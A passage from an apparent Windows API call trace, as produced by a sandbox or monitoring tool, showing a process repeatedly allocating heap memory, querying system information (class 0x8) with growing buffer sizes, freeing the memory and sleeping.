RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0175.386] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0175.386] Sleep (dwMilliseconds=0x110) [0175.444] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0175.444] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0175.445] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0175.445] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0175.446] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0175.446] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0175.447] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0175.447] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0175.448] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0175.448] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0175.448] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0175.449] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0175.456] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0175.457] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0175.457] Sleep (dwMilliseconds=0x110) [0175.665] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0175.665] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0175.666] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0175.666] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0175.666] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0175.667] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0175.667] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0175.667] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0175.668] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0175.669] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0175.669] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0175.670] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0175.670] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0175.671] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0175.671] Sleep (dwMilliseconds=0x110) [0175.697] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0175.697] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0175.697] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0175.698] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0175.698] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0175.698] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0175.698] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0175.699] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0175.699] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0175.699] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0175.700] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0175.700] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0175.701] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0175.701] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0175.701] Sleep (dwMilliseconds=0x110) [0175.716] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0175.716] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0175.717] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0175.717] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0175.717] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0175.718] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0175.718] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0175.718] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0175.719] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0175.719] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0175.719] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0175.720] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0175.720] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0175.721] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0175.721] Sleep (dwMilliseconds=0x110) [0175.873] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0175.873] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0175.874] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0175.874] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0175.874] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0175.875] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0175.875] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0175.875] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0175.876] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0175.876] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0175.876] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0175.877] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0175.877] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0175.878] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0175.878] Sleep (dwMilliseconds=0x110) [0175.894] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0175.894] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0175.895] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0175.895] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0175.895] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0175.896] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0175.896] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0175.896] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0175.897] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0175.902] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0175.902] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0175.903] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0175.905] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0175.906] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0175.906] Sleep (dwMilliseconds=0x110) [0176.032] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0176.032] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0176.033] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0176.033] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0176.034] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0176.034] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0176.035] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0176.035] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0176.035] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0176.036] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0176.037] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0176.037] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0176.043] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0176.045] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0176.045] Sleep (dwMilliseconds=0x110) [0176.061] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0176.061] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0176.062] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0176.066] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0176.066] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0176.066] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0176.067] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0176.067] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0176.068] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0176.068] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0176.068] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0176.069] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0176.069] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0176.069] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0176.069] Sleep (dwMilliseconds=0x110) [0176.078] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0176.078] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0176.079] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0176.079] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0176.079] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0176.080] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0176.080] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0176.080] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0176.081] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0176.081] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0176.081] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0176.082] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0176.082] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0176.083] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0176.083] Sleep (dwMilliseconds=0x110) [0176.126] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0176.126] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0176.127] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0176.127] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0176.127] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0176.128] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0176.128] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0176.129] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0176.130] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0176.130] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0176.130] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0176.131] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0176.131] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0176.132] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0176.132] Sleep (dwMilliseconds=0x110) [0176.193] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0176.193] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0176.194] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0176.194] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0176.194] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0176.195] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0176.195] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0176.195] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0176.196] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0176.214] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0176.214] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0176.215] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0176.219] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0176.220] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0176.220] Sleep (dwMilliseconds=0x110) [0176.319] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0176.319] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0176.320] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0176.320] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0176.321] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0176.321] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0176.321] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0176.322] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0176.322] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0176.322] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0176.323] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0176.323] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0176.323] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0176.324] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0176.324] Sleep (dwMilliseconds=0x110) [0176.544] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0176.544] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0176.545] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0176.545] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0176.545] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0176.546] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0176.546] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0176.547] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0176.547] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0176.548] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0176.548] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0176.548] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0176.549] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0176.549] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0176.549] Sleep (dwMilliseconds=0x110) [0176.585] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0176.585] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0176.585] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0176.586] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0176.586] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0176.587] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0176.587] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0176.587] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0176.588] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0176.588] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0176.588] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, 